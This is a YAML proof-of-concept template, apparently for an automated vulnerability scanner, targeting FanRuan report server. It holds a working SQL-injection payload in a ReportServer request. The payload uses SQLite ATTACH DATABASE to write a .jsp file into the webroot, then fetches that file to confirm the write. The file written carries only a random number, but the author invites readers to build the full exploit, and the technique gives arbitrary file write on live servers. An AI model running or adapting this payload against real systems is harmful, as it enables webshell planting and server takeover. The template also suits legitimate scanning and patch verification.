Quake
http_path: "/webroot/decision/login"
参考了一下甜甜圈师傅发的Poc
`params: []``name: 帆软sqlite-uploadjsp``set:` `r1: randomInt(100, 1000)` `r2: randomLowercase(6)``rules:``- method: GET` `path: /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2F{{r2}}.jsp%27%20as%20{{r2}}%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20{{r2}}.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20{{r2}}.exp2%28data%29%20VALUES%20%28%27{{r1}}%27%29%3B'),1,1)}` `headers: {}` `body:` `search: ""` `followredirects: false` `expression: |` `response.status == 302``- method: GET` `path: /webroot/{{r2}}.jsp` `headers: {}` `body:` `search: ""` `followredirects: false` `expression: |` `response.status == 200 && response.body.bcontains(bytes(string(r1)))``groups: {}``detail:` `author: "mlxwl"` `links: []` `description: "仅上传无害文件检测漏洞,exp还请自行构造"` `version: ""`